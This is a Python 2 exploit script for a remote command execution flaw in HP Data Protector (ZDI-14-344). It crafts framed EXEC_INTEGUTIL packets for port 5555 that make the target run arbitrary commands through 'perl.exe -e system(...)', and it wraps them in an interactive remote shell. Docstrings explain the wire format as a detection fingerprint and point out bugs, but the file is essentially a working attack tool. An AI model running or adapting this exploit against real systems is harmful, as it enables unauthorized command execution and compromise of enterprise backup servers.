hp_exploit.py
#!/usr/bin/python
# (0Day) Hewlett-Packard Data Protector EXEC_INTEGUTIL Remote Command Execution Vulnerability
# https://www.zerodayinitiative.com/advisories/ZDI-14-344/
# Credit Aniway.Anyway@gmail.com, Juan Vazquez (Metasploit)
#
# Terribly ported to python by AntGarSil
#
from struct import *
import string, random, socket, unicodedata,re
####
# Generate random lowercase text of size 'size'
####
def generate_text(size, chars=string.ascii_lowercase):
    """Return ``size`` characters picked independently at random from ``chars``.

    Only used for variable filler fields; ``random`` is not a cryptographic
    source, which does not matter for this purpose.
    """
    picked = []
    for _ in range(size):
        picked.append(random.choice(chars))
    return ''.join(picked)
####
# Generate list with HP Data protector format required for EXEC_INTEGUTIL
# HP opcode for EXEC_INTEGUTIL is 28
####
def build_payload_list(cmd):
    """Return the ordered field list for one EXEC_INTEGUTIL request.

    Layout as built here: the literal "2", five 8-character random
    lowercase strings, the opcode "28", then every element of ``cmd``
    in order. ``cmd`` is expected to be an iterable of strings (the
    caller in this file passes a list beginning with "perl.exe").

    The random filler makes the request bytes differ on every call, so a
    network signature for this traffic should key on the fixed opcode
    field and the framing produced by build_pkt, not on exact bytes.
    """
    payload_list = ["2",generate_text(8),generate_text(8),generate_text(8),generate_text(8),generate_text(8), "28"]
    for item in cmd:
        payload_list.append(item)
    return payload_list
####
# Packs payload with specific format to interact with HP Data Protector
####
def build_pkt(fields):
    """Frame ``fields`` into one request buffer for the Data Protector service.

    Wire layout produced by this function (useful as a detection
    fingerprint):
      * 4-byte big-endian length of everything that follows
      * the two bytes 0xFF 0xFE
      * each field as UTF-16LE text followed by a two-byte NUL, with a
        UTF-16LE space (0x20 0x00) between consecutive fields
    The separator emitted after the last field is trimmed, which is why
    the length is ``len(data)-2`` and the slice drops the final two bytes.

    Python 2 only: the backtick repr and the str/bytes concatenation
    below do not run on Python 3.
    """
    data = pack("!2c","\xff","\xfe")
    for field in fields:
        # NUL-terminated UTF-16LE encoding of one field
        utfstring = field.encode('utf-16le') + "\x00\x00"
        data+=pack("!" + `len(utfstring)`+"s",utfstring )
        # "!1s" keeps only the first byte of the encoded space; the
        # explicit "\x00" supplies the second byte of the UTF-16LE pair
        data+=pack("!1s"," ".encode('utf-16le')) + "\x00"
    return pack("!I",len(data)-2) + data[0:len(data)-2]
####
# Sends crafted payload and prints response from host:port
####
def run_cmd(host,port,cmd):
    """Send the framed buffer ``cmd`` over a new TCP connection and print the reply.

    NOTE(review): the ``host``/``port`` parameters are not used; the
    connection goes to the module-level ``HOST``/``PORT``.
    No timeout is set on the socket, so ``recv`` blocks until the peer
    closes the connection. ``close`` is not in a ``finally``, so an
    exception raised by ``recv`` leaves the socket open.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))
    s.sendall(cmd)
    while 1:
        data = s.recv(1024)
        if not data : break
        # Non-ASCII bytes are dropped, then runs of the listed characters
        # ending in a '9' are removed; presumably this strips protocol
        # noise from the reply -- TODO confirm against a real response
        print re.sub("[><a-zA-Z`~|^/\\\\]*?9.?","" ,data.decode('ascii',errors='ignore')) #Decode and print reply
    s.close()
    return
def escape_dir(folder):
    """Return ``folder`` with every backslash doubled.

    The result is later embedded inside a double-quoted string literal,
    where a single backslash would be consumed as an escape character.
    """
    pieces = folder.split('\\')
    return '\\\\'.join(pieces)
#return "\\\"" + folder + "\\\""
# TODO Fix this
def do_cd(cmd,old_dir):
    """Compute the new working directory for the shell's ``cd`` built-in.

    ``cmd`` is the whitespace-split command line (``cmd[0]`` is "cd"); the
    list is modified in place to give the path a trailing backslash.
    ``old_dir`` is the current directory with backslashes already doubled
    by escape_dir. Returns the escaped new directory, or '' when ``cmd``
    carries no argument.

    An argument whose second and third characters are ":\\" is treated as
    absolute; anything else is appended to ``old_dir``. When the argument
    contained spaces (``len(cmd) > 2``) the pieces are re-joined with
    single spaces before escaping.
    """
    current_dir = ''
    if len(cmd) == 2:
        if cmd[1][len(cmd[1])-1] != '\\':
            cmd[1] = cmd[1] + '\\' #Terminate our directories in slash
        # looks like a leftover debug print
        print cmd[1]
        if cmd[1][1] == ':' and cmd[1][2] == '\\': #Check if absolute path
            current_dir = escape_dir(cmd[1])
        else: #Relative path
            current_dir = old_dir + escape_dir(cmd[1])
    elif len(cmd) > 2: #Path probably has spaces
        lastelement = len(cmd) - 1
        if cmd[lastelement][len(cmd[lastelement])-1] != '\\':
            cmd[lastelement] = cmd[lastelement] + '\\' #Terminate our directories in slash
        # looks like a leftover debug print (only the first piece is shown)
        print cmd[1]
        if cmd[1][1] == ':' and cmd[1][2] == '\\': #Check if absolute path
            current_dir = escape_dir(string.join(cmd[1:],' '))
        else: #Relative path
            current_dir = old_dir + escape_dir(string.join(cmd[1:],' '))
    return current_dir
def interactive_shell(host,port):
    """Read command lines from stdin in a loop and hand each one to run_cmd.

    Handled locally: an empty line prints a reminder, ``cd`` updates
    ``current_dir`` through do_cd, and ``exit`` ends the process. Any
    other line is turned into a ``perl.exe -e system(...)`` argument
    list, framed by build_payload_list/build_pkt, and sent.
    ``host``/``port`` are passed straight through to run_cmd.
    """
    current_dir = ''
    while 1:
        # The prompt shows the directory with the doubled backslashes undone
        cmd = raw_input(current_dir.replace('\\\\','\\') +' $ ')
        cmd_array = cmd.split()
        if len(cmd_array) == 0:
            print 'Enter a command'
        elif cmd_array[0] == "cd":
            current_dir = do_cd(cmd_array,current_dir)
        elif cmd_array[0] == "exit":
            exit()
        else:
            # Build the one-liner argument list; when a directory is set it
            # is prefixed to the first argument inside an escaped quote
            if current_dir:
                a = ["perl.exe","-e","system(\"" + escape_dir(cmd_array[0]) + " \\\"" + current_dir + string.join(cmd_array[1:],"\\\" ") + "\")"]
            else:
                a = ["perl.exe","-e","system(\"" + escape_dir(cmd_array[0]) + string.join(cmd_array[1:],"\\\" ") + "\")"]
            payload = ''
            payload_list = build_payload_list(a)
            payload = build_pkt(payload_list)
            run_cmd(host,port,payload)
# Module-level connection settings; run_cmd reads these globals directly
# rather than its own host/port parameters.
HOST = ''
PORT = 5555 # HP Data Protector Port
#a = ["perl.exe","-e","system('whoami.exe')"]
#payload_list = build_payload_list(a)
#payload = build_pkt(payload_list)
#run_cmd(HOST,PORT,payload)
# No __main__ guard: the shell starts as soon as the module is executed or imported
interactive_shell(HOST,PORT)